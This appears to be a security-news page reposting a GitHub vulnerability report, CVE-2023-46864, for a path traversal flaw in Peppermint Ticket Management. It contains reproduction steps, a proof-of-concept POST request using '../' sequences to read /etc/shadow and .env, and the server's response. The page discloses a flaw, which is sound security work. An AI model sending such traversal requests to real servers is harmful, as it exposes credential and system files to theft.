Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-46864: Path Traversal - Arbitrary File Download · Issue #171 · Peppermint-Lab/peppermint

Peppermint Ticket Management through 0.2.4 allows remote attackers to read arbitrary files via a /api/v1/ticket/1/file/download?filepath=…/ POST request.

CVE
Open in Source
#web#windows#js#git#ssh#docker#firefox

Description

When downloading a file attached to a ticket, it was observed to be able to download arbitrary files off the web server due to the filepath query parameter not being validated and passed directly to fs.createReadStream. Instructions to download and run the latest release were followed from here: https://github.com/Peppermint-Lab/peppermint/tree/master#-installation-with-docker

Steps to Reproduce

  1. Login to the application.
  2. Create a new ticket.
  3. Upload a file.
  4. Download the file and intercept the request in Burp Suite.
  5. Change the filepath parameter to “…/…/…/…/…/…/etc/shadow” or “…/…/…/…/…/…/etc/passwd” or “./.env”

Proof of Concept Request and Response

Request:

POST /api/v1/ticket/1/file/download?filepath=../../../../../../etc/shadow HTTP/1.1
Host: localhost:5000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.00) Gecko/20100101 Firefox/118.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://localhost:5000/ticket/1
Content-Type: multipart/form-data; boundary=---------------------------9995410711832151211174726991
Content-Length: 61
Origin: http://localhost:5000
Connection: close
Cookie: token=<omitted>
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------9995410711832151211174726991--

Response:

HTTP/1.1 200 OK
Date: Sat, 14 Oct 2023 23:28:05 GMT
Connection: close
Content-Length: 476

root:!::0:::::
bin:!::0:::::
daemon:!::0:::::
adm:!::0:::::
lp:!::0:::::
sync:!::0:::::
shutdown:!::0:::::
halt:!::0:::::
mail:!::0:::::
news:!::0:::::
uucp:!::0:::::
operator:!::0:::::
man:!::0:::::
postmaster:!::0:::::
cron:!::0:::::
ftp:!::0:::::
sshd:!::0:::::
at:!::0:::::
squid:!::0:::::
xfs:!::0:::::
games:!::0:::::
cyrus:!::0:::::
vpopmail:!::0:::::
ntp:!::0:::::
smmsp:!::0:::::
guest:!::0:::::
nobody:!::0:::::
node:!:<omitted for security>
nextjs:!:<omitted for security>

Impact

Allowing users to download system files, such as /etc/passwd, /etc/shadow, configuration files, application source code, and other users files. The etc/shadow file and .env file were able to be retrieved through the app.

References

https://cwe.mitre.org/data/definitions/22.html
https://portswigger.net/web-security/file-path-traversal

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE